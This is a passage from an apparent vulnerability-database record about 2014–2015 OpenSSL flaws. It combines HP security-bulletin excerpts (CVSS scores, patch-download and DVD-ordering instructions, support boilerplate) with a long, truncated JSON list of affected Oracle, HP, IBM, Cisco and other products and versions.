(AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0289 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0290 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0291 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0292 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0293 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-1787 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6 CVE-2015-1788 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-1789 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-1790 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-1791 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-1792 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-2134 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0 CVE-2015-2139 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5 CVE-2015-2140 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9 CVE-2015-2301 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-2331 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-2348 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2015-2787 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-3113 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2015-5122 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2015-5123 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2015-5402 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9 CVE-2015-5403 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5 CVE-2015-5404 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5405 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0 CVE-2015-5427 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5428 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5429 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5430 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2015-5431 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9 CVE-2015-5432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5433 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following software updates available to resolve the vulnerabilities in the impacted versions of HP Matrix Operating Environment
HP Matrix Operating Environment 7.5.0 is only available on DVD. Please order the latest version of the HP Matrix Operating Environment 7.5.0 DVD #2 ISO from the following location:
http://www.hp.com/go/insightupdates
Choose the orange Select button. This presents the HP Insight Management Media order page. Choose Insight Management 7.5 DVD-2-ZIP August 2015 from the Software specification list. Fill out the rest of the form and submit it.
HP has addressed these vulnerabilities for the affected software components bundled with the HP Matrix Operating Environment in the following HP Security Bulletins.
HP Matrix Operating Environment component HP Security Bulletin Number Security Bulletin Location
HP Systems Insight Manager (SIM) HPSBMU03394 HPSBMU03394 https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04762744
HP System Management Homepage (SMH) HPSBMU03380 http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04746490&la ng=en-us&cc=
HP Version Control Agent (VCA) HPSBMU03397 https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04765169
HP Version Control Repository Manager (VCRM) HPSBMU03396 https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr _na-c04765115
HP Virtual Connect Enterprise Manager (VCEM) SDK HPSBMU03413 https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr _na-c04774021
HISTORY Version:1 (rev.1) - 24 August 2015 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.13 (GNU/Linux)
iEYEARECAAYFAlXbREoACgkQ4B86/C0qfVl2EQCcC7+X+ufWAfXznICabd38dIqX /uwAmwTKaw3ON48Dwm7wtl1Cw1+vwZGJ =kie8 -----END PGP SIGNATURE----- .
References:
CVE-2014-8275 Cryptographic Issues (CWE-310) CVE-2014-3569 Remote Denial of Service (DoS) CVE-2014-3570 Cryptographic Issues (CWE-310) CVE-2014-3571 Remote Denial of Service (DoS) CVE-2014-3572 Cryptographic Issues (CWE-310) CVE-2015-0204 Cryptographic Issues (CWE-310) SSRT101885
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. The updates are available from either of the following sites:
ftp://sl098ze:Secure12@h2.usa.hp.com
https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber =OPENSSL11I
HP-UX Release HP-UX OpenSSL depot name
B.11.11 (11i v1) OpenSSL_A.00.09.08ze.001_HP-UX_B.11.11_32_64.depot
B.11.23 (11i v2) OpenSSL_A.00.09.08ze.002_HP-UX_B.11.23_IA-PA.depot
B.11.31 (11i v3) OpenSSL_A.00.09.08ze.003_HP-UX_B.11.31_IA-PA.depot
MANUAL ACTIONS: Yes - Update
Install OpenSSL A.00.09.08ze or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201501-0435", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "communications policy management", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "9.9.1" }, { "model": "communications core session manager", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "7.3.5" }, { "model": "communications policy management", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "9.7.3" }, { "model": "communications core session manager", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "7.2.5" }, { "model": "communications policy management", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "10.4.1" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1e" }, { "model": "openssl", "scope": "lte", "trust": 1.0, "vendor": "openssl", "version": "0.9.8zc" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0k" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(arm) 4.1" }, { "model": "supply chain products suite", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle transportation management 6.2" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(arm) 4.3" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.9.5" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(x86) 4.2" }, { "model": "xcp", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "2260" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(x86) 5.0" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.8.5" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 4.63" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle mobile security suite mss 3.0" }, { "model": "solaris", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "11.2" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 4.71" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.0p" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle exalogic infrastructure 1.x" }, { "model": "communications policy management", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "12.1.1 and earlier" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.0" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(x86) 4.1" }, { "model": "supply chain products suite", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle transportation management 6.1" }, { "model": "mysql", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "5.6.22 and earlier" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(x86) 4.4" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(arm) 4.4" }, { "model": "http server", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "11.5.10.2" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(arm) 4.2" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(x86) 4.3" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle tuxedo 12.1.1.0" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(x86) 5.1" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.10 to 10.10.2" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.1k" }, { "model": "xcp", "scope": "lt", "trust": 0.8, "vendor": "oracle", "version": "(fujitsu m10-1/m10-4/m10-4s server )" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle exalogic infrastructure 2.x" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 5.1" }, { "model": "paging server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.6, "vendor": "hp", "version": "7.4" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "mate collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ata series analog terminal adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.1" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "bladecenter advanced management module 25r5778", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.186" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4.1" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1948" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.6" }, { "model": "upward integration modules scvmm add-in", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x22025850" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "6" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.4" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6" }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "idataplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79120" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "insight orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.780" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32400" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.2.2" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "85100" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.2" }, { "model": "communications session border controller scz7.4.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "retail predictive application server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "16.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.2" }, { "model": "ip interoperability and collaboration system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl 1.0.0p", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "systems insight manager 7.3.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.0" }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "tivoli netcool/reporter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70104.1" }, { "model": "prime security manager 04.8 qa08", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "ns oncommand core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "cognos planning interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1.1.4" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7" }, { "model": "project openssl 0.9.8zb", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.0-68" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.842" }, { "model": "workflow for bluemix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "flex system manager node types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79550" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.0" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "app for netapp data ontap", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "0" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "filenet system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0.870" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2-77" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "telepresence te software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "linux enterprise software development kit sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9.1.11" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x350073830" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "7" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.2.2.2" }, { "model": "network configuration and change management service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "systems insight manager sp2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.840" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "systems insight manager sp1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian mse model", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.2.8" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2.77" }, { "model": "project openssl 0.9.8w", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x310025820" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "1" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.3" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1.0" }, { "model": "project openssl 1.0.0m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.27" }, { "model": "cognos planning interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.12" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24087380" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "communications security gateway", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.0" }, { "model": "exalogic infrastructure", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "alienvault", "scope": "ne", "trust": 0.3, "vendor": "alienvault", "version": "4.15.1" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.96" }, { "model": "project openssl 1.0.1k", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "bladecenter -t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8720" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "media services interface", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.6.156" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "project openssl 1.0.1i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.12" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2" }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.13" }, { "model": "project openssl 1.0.0h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.6" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "ns oncommand core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.10" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.12" }, { "model": "system management homepage c", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.186" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.1" }, { "model": "enterprise content delivery service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "adaptive security appliance software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.4(7.26)" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.8.0.10" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8886" }, { "model": "unified sip proxy", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence advanced media gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "communications session border controller scz7.3.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": 